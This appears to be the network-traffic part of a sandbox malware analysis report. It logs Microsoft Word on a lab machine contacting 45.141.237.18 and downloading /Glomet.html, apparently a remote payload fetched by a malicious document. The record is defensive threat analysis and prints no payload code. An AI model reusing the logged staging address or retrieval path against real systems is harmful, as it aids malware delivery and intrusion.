                                                                                                                                                                            Jul 15, 2022 15:28:25.540385962 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540404081 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540421009 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540421963 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540450096 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540458918 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540467978 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540493965 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540519953 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540535927 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540575981 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540579081 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540597916 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540616035 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540622950 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540633917 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540651083 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540668011 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.540677071 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.540719032 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.541029930 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.541062117 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.541121006 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.567651987 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.567684889 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.567702055 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.567719936 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.567738056 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.567756891 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.567766905 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.567775011 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.567791939 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.567811012 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.567821026 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.567827940 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.567846060 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.567852020 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.567864895 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.567882061 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.567882061 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.567900896 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.567934990 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.567951918 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.567994118 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568011045 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.568011999 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568027973 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568048954 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.568058014 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568075895 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568113089 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.568114996 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568146944 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.568155050 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568185091 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568202019 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568218946 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568222046 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.568248034 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568265915 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568265915 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.568284035 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568300962 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568320036 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.568341017 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568356991 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.568358898 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568376064 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568392038 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.568392992 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568423033 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568424940 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.568504095 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568522930 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568540096 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568557978 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568563938 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.568576097 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568593025 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568600893 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.568610907 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568623066 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.568629026 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568645954 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568660021 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.568662882 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568692923 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568698883 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.568711042 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568727016 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568747044 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.568748951 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.568789005 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.595837116 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.595885038 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.595902920 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.595915079 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.595927954 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.595954895 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.595967054 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.596043110 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.596045017 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.596061945 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.596081018 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.596100092 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.596117973 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.596151114 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.596151114 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.596201897 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.596282005 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.596299887 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.596318007 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.596337080 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.596353054 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.596379042 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.596396923 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.596400976 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.596529007 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.596560001 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.596589088 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.596610069 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.596641064 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.596676111 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.596681118 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.596724033 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.596724033 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.596755981 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.596795082 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.596798897 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.596834898 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.596875906 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.596910000 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.596997976 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.597014904 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.597032070 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.597050905 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.597084999 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.597090006 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.597131014 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.597148895 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.597166061 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.597187996 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.597194910 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.597218990 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.597235918 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.597271919 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.597276926 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.597409964 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.597439051 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.597475052 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.597491026 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.597592115 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.597641945 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.597660065 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.597709894 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.597714901 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.597764015 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.597784042 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.597834110 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.597878933 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.600888014 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.625363111 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625391960 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625410080 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625427961 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625443935 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625462055 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625478983 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625495911 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625495911 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.625514984 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625525951 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.625528097 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625540972 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625555038 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625571012 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625587940 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625597000 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.625602007 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625622034 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625622034 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.625641108 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625657082 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625674009 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625694036 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625726938 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.625757933 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.625771046 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625788927 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625808001 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625825882 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625840902 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.625844002 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625861883 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625880003 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625880003 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.625896931 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625910044 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625921965 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.625926971 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625945091 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625958920 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.625961065 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625981092 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625997066 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.625999928 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.626017094 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.626033068 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.626050949 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.626055956 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.626068115 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.626104116 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.626131058 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.631845951 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.631867886 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.631937027 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.631956100 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.659542084 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.659571886 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.659589052 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.659605980 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.659624100 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.659641027 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.659658909 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.659674883 CEST804976645.141.237.18192.168.2.3
                                                                                                                                                                            Jul 15, 2022 15:28:25.659730911 CEST4976680192.168.2.345.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:28:25.659881115 CEST4976680192.168.2.345.141.237.18

                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                            • 45.141.237.18

                                                                                                                                                                            HTTP Packets

                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            0192.168.2.34974345.141.237.1880C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jul 15, 2022 15:26:38.653311014 CEST1282OUTOPTIONS / HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                            X-MSGETWEBURL: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            Host: 45.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:38.692662954 CEST1282INHTTP/1.1 200 OK
                                                                                                                                                                            Allow: OPTIONS, TRACE, GET, HEAD, POST
                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                            Public: OPTIONS, TRACE, GET, HEAD, POST
                                                                                                                                                                            Date: Fri, 15 Jul 2022 13:26:38 GMT
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            Jul 15, 2022 15:26:38.766454935 CEST1282OUTHEAD /Glomet.html HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            Host: 45.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:38.795556068 CEST1283INHTTP/1.1 200 OK
                                                                                                                                                                            Content-Length: 13687
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Last-Modified: Thu, 14 Jul 2022 16:59:59 GMT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            ETag: "3136d726a397d81:0"
                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                            Date: Fri, 15 Jul 2022 13:26:38 GMT
                                                                                                                                                                            Jul 15, 2022 15:26:41.906877995 CEST1284OUTOPTIONS / HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                            X-MSGETWEBURL: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            Host: 45.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:41.980675936 CEST1284INHTTP/1.1 200 OK
                                                                                                                                                                            Allow: OPTIONS, TRACE, GET, HEAD, POST
                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                            Public: OPTIONS, TRACE, GET, HEAD, POST
                                                                                                                                                                            Date: Fri, 15 Jul 2022 13:26:41 GMT
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            Jul 15, 2022 15:26:42.675403118 CEST1291OUTOPTIONS / HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                            X-MSGETWEBURL: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            Host: 45.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:42.736707926 CEST1291INHTTP/1.1 200 OK
                                                                                                                                                                            Allow: OPTIONS, TRACE, GET, HEAD, POST
                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                            Public: OPTIONS, TRACE, GET, HEAD, POST
                                                                                                                                                                            Date: Fri, 15 Jul 2022 13:26:41 GMT
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            Jul 15, 2022 15:26:42.776770115 CEST1291OUTHEAD /Glomet.html HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            Host: 45.141.237.18
                                                                                                                                                                            Jul 15, 2022 15:26:42.805774927 CEST1292INHTTP/1.1 200 OK
                                                                                                                                                                            Content-Length: 13687
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Last-Modified: Thu, 14 Jul 2022 16:59:59 GMT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            ETag: "3136d726a397d81:0"
                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                            Date: Fri, 15 Jul 2022 13:26:41 GMT


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            1192.168.2.34974445.141.237.1880C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jul 15, 2022 15:26:42.139308929 CEST1285OUTGET /Glomet.html HTTP/1.1
                                                                                                                                                                            Accept: */*
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Host: 45.141.237.18
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jul 15, 2022 15:26:42.169883966 CEST1286INHTTP/1.1 200 OK
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                            Last-Modified: Thu, 14 Jul 2022 16:59:59 GMT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            ETag: "80119226a397d81:0"
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                            Date: Fri, 15 Jul 2022 13:26:41 GMT
                                                                                                                                                                            Content-Length: 4357
